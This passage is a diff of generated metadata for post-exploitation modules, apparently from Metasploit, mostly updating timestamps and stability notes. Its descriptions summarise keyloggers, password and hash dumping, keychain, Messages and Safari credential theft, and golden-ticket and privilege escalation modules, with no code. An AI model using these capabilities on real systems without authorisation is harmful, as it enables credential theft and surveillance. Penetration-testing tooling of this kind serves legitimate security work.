"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell"
@@ -210818,7 +213274,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/networking/gather/enum_juniper.rb",
"is_install_path": true,
"ref_name": "networking/gather/enum_juniper",
@@ -210854,7 +213310,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-16 13:56:50 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/networking/gather/enum_mikrotik.rb",
"is_install_path": true,
"ref_name": "networking/gather/enum_mikrotik",
@@ -210862,6 +213318,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell"
@@ -210890,7 +213355,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-12-07 11:02:10 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/networking/gather/enum_vyos.rb",
"is_install_path": true,
"ref_name": "networking/gather/enum_vyos",
@@ -210898,6 +213363,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell"
@@ -210926,7 +213400,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/admin/say.rb",
"is_install_path": true,
"ref_name": "osx/admin/say",
@@ -210953,7 +213427,7 @@
"author": [
"joev <joev@metasploit.com>"
],
"description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.",
"description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.",
"references": [
],
@@ -210963,7 +213437,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/capture/keylog_recorder.rb",
"is_install_path": true,
"ref_name": "osx/capture/keylog_recorder",
@@ -211000,7 +213474,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/capture/screen.rb",
"is_install_path": true,
"ref_name": "osx/capture/screen",
@@ -211040,7 +213514,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/osx/escalate/tccbypass.rb",
"is_install_path": true,
"ref_name": "osx/escalate/tccbypass",
@@ -211048,9 +213522,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"config-changes",
"artifacts-on-disk",
"screen-effects"
],
"Reliability": [
]
},
"session_types": [
@@ -211072,7 +213553,7 @@
"Sarah Edwards",
"cbrnrd"
],
"description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.",
"description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.",
"references": [
"URL-https://thehackernews.com/2018/03/macos-apfs-password.html",
"URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp"
@@ -211083,7 +213564,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb",
"is_install_path": true,
"ref_name": "osx/gather/apfs_encrypted_volume_passwd",
@@ -211110,7 +213591,7 @@
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.",
"description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.",
"references": [
"URL-http://www.brock-family.org/gavin/perl/kcpassword.html"
],
@@ -211120,7 +213601,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-22 22:25:39 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/autologin_password.rb",
"is_install_path": true,
"ref_name": "osx/gather/autologin_password",
@@ -211147,7 +213628,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. To loot both account\n plists and chat logs, simply set the action to 'ALL'.",
"description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. To loot both account\n plists and chat logs, simply set the action to 'ALL'.",
"references": [
],
@@ -211157,7 +213638,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_adium.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_adium",
@@ -211184,7 +213665,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.",
"description": "This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.",
"references": [
],
@@ -211194,7 +213675,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_airport.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_airport",
@@ -211221,7 +213702,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.",
"description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.",
"references": [
],
@@ -211231,7 +213712,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_chicken_vnc_profile",
@@ -211258,7 +213739,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".",
"description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".",
"references": [
],
@@ -211268,7 +213749,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_colloquy.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_colloquy",
@@ -211296,7 +213777,7 @@
"ipwnstuff <e@ipwnstuff.com>",
"joev <joev@metasploit.com>"
],
"description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.",
"description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.",
"references": [
],
@@ -211306,7 +213787,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_keychain.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_keychain",
@@ -211333,7 +213814,7 @@
"author": [
"Geckom <geckom@redteamr.com>"
],
"description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). Module\n was tested with OS X 10.11 (El Capitan).",
"description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). Module\n was tested with OS X 10.11 (El Capitan).",
"references": [
],
@@ -211343,7 +213824,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_messages.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_messages",
@@ -211370,7 +213851,7 @@
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).",
"description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).",
"references": [
],
@@ -211380,7 +213861,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/enum_osx.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_osx",
@@ -211417,7 +213898,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-04-14 17:47:19 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/osx/gather/gitignore.rb",
"is_install_path": true,
"ref_name": "osx/gather/gitignore",
@@ -211425,6 +213906,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter",
@@ -211446,7 +213936,7 @@
"hammackj <jacob.hammack@hammackj.com>",
"joev <joev@metasploit.com>"
],
"description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.",
"description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.",
"references": [
],
@@ -211456,7 +213946,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-01-20 13:11:24 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "osx/gather/hashdump",
@@ -211495,7 +213985,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-02-13 16:17:33 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/password_prompt_spoof.rb",
"is_install_path": true,
"ref_name": "osx/gather/password_prompt_spoof",
@@ -211522,7 +214012,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module downloads the LastSession.plist file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.",
"description": "This module downloads the LastSession.plist file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.",
"references": [
"URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari"
],
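Review bot: the only reference on safari_lastsession is a plain-http URL (www.securelist.com/en/blog/8168/Loophole_in_Safari). Since the module is being bumped anyway, check that the link still resolves and switch it to https if it does.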
@@ -211532,7 +214022,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/safari_lastsession.rb",
"is_install_path": true,
"ref_name": "osx/gather/safari_lastsession",
@@ -211569,7 +214059,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/gather/vnc_password_osx.rb",
"is_install_path": true,
"ref_name": "osx/gather/vnc_password_osx",
@@ -211607,7 +214097,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/manage/mount_share.rb",
"is_install_path": true,
"ref_name": "osx/manage/mount_share",
@@ -211644,7 +214134,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/manage/record_mic.rb",
"is_install_path": true,
"ref_name": "osx/manage/record_mic",
@@ -211671,7 +214161,7 @@
"Sam Aaron",
"wvu <wvu@metasploit.com>"
],
"description": "This module controls Sonic Pi via its local OSC server.\n\n The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n Yes, this is RCE, but it's local. I suggest playing music. :-)",
"description": "This module controls Sonic Pi via its local OSC server.\n\n The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n Yes, this is RCE, but it's local. I suggest playing music. :-)",
"references": [
"URL-https://sonic-pi.net/",
"URL-https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API",
@@ -211683,7 +214173,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/manage/sonic_pi.rb",
"is_install_path": true,
"ref_name": "osx/manage/sonic_pi",
@@ -211724,7 +214214,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/manage/vpn.rb",
"is_install_path": true,
"ref_name": "osx/manage/vpn",
@@ -211761,7 +214251,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/osx/manage/webcam.rb",
"is_install_path": true,
"ref_name": "osx/manage/webcam",
@@ -211799,7 +214289,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-01 22:58:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/solaris/escalate/pfexec.rb",
"is_install_path": true,
"ref_name": "solaris/escalate/pfexec",
@@ -211826,7 +214316,7 @@
"h00die",
"iDefense"
],
"description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.",
"description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.",
"references": [
"CVE-2007-2617",
"URL-https://download.oracle.com/sunalerts/1000443.1.html",
@@ -211840,7 +214330,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/solaris/escalate/srsexec_readline.rb",
"is_install_path": true,
"ref_name": "solaris/escalate/srsexec_readline",
@@ -211877,7 +214367,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/solaris/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "solaris/gather/checkvm",
@@ -211903,7 +214393,7 @@
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to enumerate installed packages on a Solaris System",
"description": "Post module to enumerate installed packages on a Solaris System",
"references": [
],
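Review bot: style only. The description change is the lowercasing of "Post Module" to "Post module" on enum_packages, and the same edit is applied to enum_services and hashdump in the next two hunks; the 14:12:25 mod_time on these three Solaris modules, versus 13:47:34 elsewhere in the diff, is consistent with a separate touch. Nothing to change here beyond confirming the source modules carry the edit, since this file is regenerated from them.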
@@ -211913,7 +214403,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 14:12:25 +0000",
"path": "/modules/post/solaris/gather/enum_packages.rb",
"is_install_path": true,
"ref_name": "solaris/gather/enum_packages",
@@ -211939,7 +214429,7 @@
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to enumerate services on a Solaris System",
"description": "Post module to enumerate services on a Solaris System",
"references": [
],
@@ -211949,7 +214439,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 14:12:25 +0000",
"path": "/modules/post/solaris/gather/enum_services.rb",
"is_install_path": true,
"ref_name": "solaris/gather/enum_services",
@@ -211975,7 +214465,7 @@
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to dump the password hashes for all users on a Solaris System",
"description": "Post module to dump the password hashes for all users on a Solaris System",
"references": [
],
@@ -211985,7 +214475,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-13 10:13:27 +0000",
"mod_time": "2023-02-08 14:12:25 +0000",
"path": "/modules/post/solaris/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "solaris/gather/hashdump",
@@ -212022,7 +214512,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 14:12:25 +0000",
"path": "/modules/post/windows/capture/keylog_recorder.rb",
"is_install_path": true,
"ref_name": "windows/capture/keylog_recorder",
@@ -212059,7 +214549,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/capture/lockout_keylogger.rb",
"is_install_path": true,
"ref_name": "windows/capture/lockout_keylogger",
@@ -212095,7 +214585,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/escalate/droplnk.rb",
"is_install_path": true,
"ref_name": "windows/escalate/droplnk",
@@ -212131,7 +214621,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-16 14:53:45 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/escalate/getsystem.rb",
"is_install_path": true,
"ref_name": "windows/escalate/getsystem",
@@ -212175,7 +214665,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/escalate/golden_ticket.rb",
"is_install_path": true,
"ref_name": "windows/escalate/golden_ticket",
@@ -212216,7 +214706,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb",
"is_install_path": true,
"ref_name": "windows/escalate/ms10_073_kbdlayout",
@@ -212253,7 +214743,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/escalate/screen_unlock.rb",
"is_install_path": true,
"ref_name": "windows/escalate/screen_unlock",
@@ -212295,7 +214785,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/escalate/unmarshal_cmd_exec",
@@ -212321,7 +214811,7 @@
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.",
"description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.",
"references": [
],
@@ -212331,7 +214821,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-04-05 13:08:46 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/ad_to_sqlite.rb",
"is_install_path": true,
"ref_name": "windows/gather/ad_to_sqlite",
@@ -212367,7 +214857,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/arp_scanner.rb",
"is_install_path": true,
"ref_name": "windows/gather/arp_scanner",
@@ -212403,7 +214893,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-05-13 04:01:03 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/gather/avast_memory_dump.rb",
"is_install_path": true,
"ref_name": "windows/gather/avast_memory_dump",
@@ -212411,6 +214901,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
@@ -212440,7 +214940,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/bitcoin_jacker.rb",
"is_install_path": true,
"ref_name": "windows/gather/bitcoin_jacker",
@@ -212477,7 +214977,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-23 17:41:20 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/bitlocker_fvek.rb",
"is_install_path": true,
"ref_name": "windows/gather/bitlocker_fvek",
@@ -212563,7 +215063,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/cachedump.rb",
"is_install_path": true,
"ref_name": "windows/gather/cachedump",
@@ -212695,7 +215195,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/avira_password.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/avira_password",
@@ -212731,7 +215231,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/bulletproof_ftp",
@@ -212901,7 +215401,7 @@
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.",
"description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.",
"references": [
],
@@ -212911,7 +215411,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-19 20:35:33 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/coreftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/coreftp",
@@ -212947,7 +215447,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/credential_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/credential_collector",
@@ -213031,7 +215531,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-23 17:41:20 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/domain_hashdump",
@@ -213057,7 +215557,7 @@
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 98 and Windows Me.",
"description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 98 and Windows Me.",
"references": [
"CVE-2001-0152",
"MSB-MS01-019",
@@ -213070,7 +215570,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/dynazip_log.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/dynazip_log",
@@ -213108,7 +215608,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/dyndns.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/dyndns",
@@ -213144,7 +215644,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_cred_store",
@@ -213180,7 +215680,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/enum_laps.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_laps",
@@ -213217,7 +215717,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_picasa_pwds",
@@ -213253,7 +215753,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
